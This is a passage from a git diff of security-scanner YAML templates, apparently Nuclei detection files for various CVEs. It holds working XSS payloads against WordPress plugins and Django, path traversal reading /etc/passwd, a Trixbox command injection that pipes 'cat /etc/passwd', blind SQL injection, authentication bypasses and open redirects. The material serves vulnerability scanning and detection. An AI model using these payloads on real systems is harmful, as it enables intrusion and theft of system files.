4b0a00483046022100c51eb02b55ee8351b095e66fd40d6e82a2c34175823525c78a617a78cec7cb810221009cadacb6a5bfe65f3484c61f990dd5b24c740e53cf58dc5e1d87499aea9e8872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000134.yaml b/poc/cve/CVE-2016-1000134.yaml index b9bf608cea..d781de2ee0 100644 --- a/poc/cve/CVE-2016-1000134.yaml +++ b/poc/cve/CVE-2016-1000134.yaml @@ -1,33 +1,25 @@ id: CVE-2016-1000134 info: - name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php author: daffainfo severity: medium - description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - https://wordpress.org/plugins/hdw-tube - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49889 - cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hdw-tube_project - product: hdw-tube - framework: wordpress google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve,cve2016,wordpress,xss,wp-plugin -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -35,9 +27,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header @@ -47,4 +39,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da5dab271b8802808631270457f57f5994e0690683d67fa537c62ddceec66f320220538c9e9e48d6c08c54d24ad017c0a383ab38d9a51a5ebb81668436eb5ee223b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000143.yaml b/poc/cve/CVE-2016-1000143.yaml index e426b63aa3..3b67015203 100644 --- a/poc/cve/CVE-2016-1000143.yaml +++ b/poc/cve/CVE-2016-1000143.yaml @@ -1,49 +1,33 @@ id: CVE-2016-1000143 - info: - name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting + name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor. + description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://wordpress.org/plugins/photoxhibit - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 + - https://wordpress.org/plugins/photoxhibit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49745 - cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: photoxhibit_project - product: photoxhibit - framework: wordpress tags: cve,cve2016,wordpress,wp-plugin,xss - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '' - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100e7ca934d68266a3e570bdddaacb8abe8b6d04b7685c395ae8c2f826b248c0fc3022100f519f77b2ce2685c3fcce3dbea85e33309613fbb8e175db1575b7c85bbc54165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000146.yaml b/poc/cve/CVE-2016-1000146.yaml index 2ba55d4526..f14bf4f330 100644 --- a/poc/cve/CVE-2016-1000146.yaml +++ b/poc/cve/CVE-2016-1000146.yaml @@ -1,32 +1,19 @@ id: CVE-2016-1000146 info: - name: WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting + name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability. - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 - - https://wordpress.org/plugins/pondol-formmail - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + tags: cve,cve2016,wordpress,xss,wp-plugin,mail classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45801 - cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: pondol-formmail_project - product: pondol-formmail - framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin,mail + description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -34,9 +21,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header @@ -46,4 +33,3 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210093c8445c11f415ff59a2ea84ec6d762f1b539c26be7f49f199b235f4955560d902204020aec5844f8ffd75c8cf3ef37da8ebb75c0ce3d7b96b41e5790f0cc26d1574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000154.yaml b/poc/cve/CVE-2016-1000154.yaml index 224b14f744..5812a26749 100644 --- a/poc/cve/CVE-2016-1000154.yaml +++ b/poc/cve/CVE-2016-1000154.yaml @@ -1,34 +1,49 @@ id: CVE-2016-1000154 + info: - name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) + name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting author: daffainfo severity: medium - description: Reflected XSS in wordpress plugin whizz v1.0. + description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49745 + cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: browserweb + product: whizz + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a00473045022100eaa3c28f65c65ac7217e2267b8416e76471a54e695b51014fa5e7a16b2f722ff02206c7c0182fff2cfaf67f8222a698473dcca6b2b38b1efd81bbc4113eb2ebafd81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000155.yaml b/poc/cve/CVE-2016-1000155.yaml index de8ccbe948..70f109f44c 100644 --- a/poc/cve/CVE-2016-1000155.yaml +++ b/poc/cve/CVE-2016-1000155.yaml @@ -1,32 +1,19 @@ id: CVE-2016-1000155 info: - name: WordPress WPSOLR <=8.6 - Cross-Site Scripting + name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of WPSOLR plugin (8.7 or higher). - reference: - - https://wordpress.org/plugins/wpsolr-search-engine - - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - epss-score: 0.00103 - epss-percentile: 0.41683 - cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: wpsolr - product: wpsolr-search-engine - framework: wordpress - tags: cve,cve2016,wordpress,xss,wp-plugin + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -34,9 +21,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header @@ -46,4 +33,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9038473fafe52cc4b5874ec8536c9b036f0290d4655fc9128da48d21f6bef660220186364b4daf33293067febd6647d40e5574466af405f198bf886d22f7ef0a169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-10367.yaml b/poc/cve/CVE-2016-10367.yaml index 5c754519c7..c7285e8ae6 100644 --- a/poc/cve/CVE-2016-10367.yaml +++ b/poc/cve/CVE-2016-10367.yaml @@ -1,27 +1,44 @@ id: CVE-2016-10367 + info: - name: Opsview Monitor Pro - Unauthenticated Directory Traversal + name: Opsview Monitor Pro - Local File Inclusion author: 0x_akoko severity: high - description: The unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass + description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + remediation: | + Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: - - https://www.cvedetails.com/cve/CVE-2016-10367 - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10367 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10367 cwe-id: CWE-22 + epss-score: 0.01346 + epss-percentile: 0.84603 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* + metadata: + verified: true + max-request: 1 + vendor: opsview + product: opsview + shodan-query: title:"Opsview" tags: cve,cve2016,opsview,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 404 +# digest: 4b0a00483046022100fd2ab29066206b564709a4a43d2258badc5de7bdcaeae07f52bb8297c2005dd2022100e5ea673a027614e2c3b8c5ba0943ca3af9581ebee0f2bd25ef125d908bfd3b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-10940.yaml b/poc/cve/CVE-2016-10940.yaml index 906a492ffa..09a4757397 100644 --- a/poc/cve/CVE-2016-10940.yaml +++ b/poc/cve/CVE-2016-10940.yaml @@ -1,34 +1,21 @@ id: CVE-2016-10940 - info: name: WordPress zm-gallery plugin 1.0 SQL Injection author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. - remediation: | - Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - - https://wordpress.org/plugins/zm-gallery/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 - epss-score: 0.00696 - epss-percentile: 0.77975 - cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* - metadata: - max-request: 3 - vendor: zm-gallery_project - product: zm-gallery - framework: wordpress - tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated - -http: + tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -44,7 +31,8 @@ http: - | GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} - + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: @@ -53,4 +41,5 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and -# digest: 490a00463044022061955ffb85d47212a0ae3ccbcd512ea4a1a81cfdfbfb7fc63a0cf9c4dd8eee5102205349ca6b645e5be5a0209c6358e8603b07034afd4de57bc9beddb54623be8d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/CVE-2016-7552.yaml b/poc/cve/CVE-2016-7552.yaml index eb53993917..140a337d54 100644 --- a/poc/cve/CVE-2016-7552.yaml +++ b/poc/cve/CVE-2016-7552.yaml @@ -1,46 +1,34 @@ id: CVE-2016-7552 - info: name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - remediation: | - Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 + - http://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - epss-score: 0.97004 - epss-percentile: 0.99681 - cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: trendmicro - product: threat_discovery_appliance - tags: msf,cve,cve2016,lfi,auth,bypass - -http: + tags: cve,cve2016,lfi,auth,bypass +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/logoff.cgi" - headers: Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: body words: - "Memory map" + part: body - - type: status - status: - - 200 -# digest: 4a0a00473045022100f94ac860dc3e8f0596d0f1ff2cc0216572e607fc9a80a6cc71a4b5e7a8ab770d022025453afcb701644d58bd8b104aca7eb245a0863fe1169f541c66983e4b774b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/05/10 diff --git a/poc/cve/CVE-2017-11586.yaml b/poc/cve/CVE-2017-11586.yaml index 5816b710d3..8d62ec0631 100644 --- a/poc/cve/CVE-2017-11586.yaml +++ b/poc/cve/CVE-2017-11586.yaml @@ -1,25 +1,46 @@ id: CVE-2017-11586 + info: - name: dayrui FineCms 5.0.9 - Open redirect + name: FineCMS <5.0.9 - Open Redirect author: 0x_Akoko - severity: low - description: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action. + severity: medium + description: | + FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - - https://www.cvedetails.com/cve/CVE-2017-11586 - - https://vuldb.com/?id.104434 - tags: cve,cve2017,redirect,opentext + - https://nvd.nist.gov/vuln/detail/CVE-2017-11586 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-11586 cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?c=weixin&m=sync&url=http://example.com' + epss-score: 0.00121 + epss-percentile: 0.46157 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: finecms + product: finecms + tags: cve,cve2017,redirect,finecms + +http: + - raw: + - | + POST /index.php?s=member&c=login&m=index HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1 + - | + GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1 + Host: {{Hostname}} + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - 'Refresh:(.*)url=http:\/\/interact\.sh' +# digest: 4a0a00473045022012509eabce87ba3935765ddc6532e3a6d2c09fe4379599d5dd7c1e7383e33be5022100a3fd0d355a68651ee526f569ea234e085e8ab6afce65195a78a4718b6a0a1090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-12542.yaml b/poc/cve/CVE-2017-12542.yaml index e6b40b0d91..f47f845ac7 100644 --- a/poc/cve/CVE-2017-12542.yaml +++ b/poc/cve/CVE-2017-12542.yaml @@ -1,38 +1,52 @@ id: CVE-2017-12542 info: - name: ILO4 Authentication bypass + name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass author: pikpikcu severity: critical - description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + remediation: | + Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 - tags: cve,cve2017,ilo4,hpe + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us + - https://www.exploit-db.com/exploits/44005/ + - http://www.securitytracker.com/id/1039222 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-12542 + epss-score: 0.97377 + epss-percentile: 0.9989 + cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: hp + product: integrated_lights-out_4_firmware + tags: ilo4,hpe,auth-bypass,edb,cve,cve2017 -requests: +http: - method: GET path: - "{{BaseURL}}/rest/v1/AccountService/Accounts" + headers: Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA matchers-condition: and matchers: - type: word + part: body words: - "iLO User" - part: body - type: word + part: header words: - "application/json" - part: header - type: status status: - 200 +# digest: 4a0a004730450220429a8b37441b3f7a31d7a70b3d8cf3816e65b09067b0c4f6b33346e41c0dae59022100f9f898aab40e31fb23cfc81fc3a7a1981385c4a1c3ed721f035c55fdf5bff51a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-12794.yaml b/poc/cve/CVE-2017-12794.yaml index ad1ea847cc..62a93166af 100644 --- a/poc/cve/CVE-2017-12794.yaml +++ b/poc/cve/CVE-2017-12794.yaml @@ -1,22 +1,34 @@ id: CVE-2017-12794 info: - name: Django debug page XSS + name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + remediation: | + Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - description: | - In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. - tags: xss,django,cve,cve2017 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 + epss-score: 0.00219 + epss-percentile: 0.59752 + cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: djangoproject + product: django + tags: xss,django,cve,cve2017 -requests: +http: - method: GET path: - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" @@ -24,15 +36,16 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word + part: header words: - "text/html" - part: header + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f1121fac785c9238b8e61276548c561b0b96e045544022766beaf1c0e0c9b7ca022017f8960e76abcfd828a50ce20b7c819daa17d70270d2cab2460815978f627ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-14524.yaml b/poc/cve/CVE-2017-14524.yaml index e87149510b..be7c67f156 100644 --- a/poc/cve/CVE-2017-14524.yaml +++ b/poc/cve/CVE-2017-14524.yaml @@ -1,25 +1,40 @@ id: CVE-2017-14524 + info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 -requests: + epss-score: 0.00258 + epss-percentile: 0.63405 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve,cve2017,redirect,opentext,seclists + +http: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' + - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4a0a00473045022067c66ad6a35140adea527b46677371897d097f59fd7bc558671a8532fbb99f4e022100f1adf441d12b7d3fbfbd021a1de838d34432ef3d8740bbd1f69fec1252a7ca12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-14535.yaml b/poc/cve/CVE-2017-14535.yaml index 44aec5d553..8cc11f11f1 100644 --- a/poc/cve/CVE-2017-14535.yaml +++ b/poc/cve/CVE-2017-14535.yaml @@ -1,33 +1,21 @@ id: CVE-2017-14535 info: - name: Trixbox - 2.8.0.4 OS Command Injection + name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability author: pikpikcu severity: high - description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. - remediation: | - Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t - - https://twitter.com/tiger_tigerboy/status/962689803270500352 + tags: cve,cve2017,trixbox,rce,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2017-14535 cwe-id: CWE-78 - epss-score: 0.04456 - epss-percentile: 0.91511 - cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: netfortris - product: trixbox - tags: cve,cve2017,trixbox,rce,injection,edb + description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." -http: +requests: - raw: - | GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 @@ -40,11 +28,11 @@ http: matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 -# digest: 4b0a00483046022100cc6f91ccb21bee7737472e19119f59099697e34db25bdadd9294c7200aced8fa022100a8cc01b81adc5ff8a8d53841aa9ce60f15f06e5372735648b552b2ea778c5d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-15647.yaml b/poc/cve/CVE-2017-15647.yaml index 05629c3502..b6d671f5a6 100644 --- 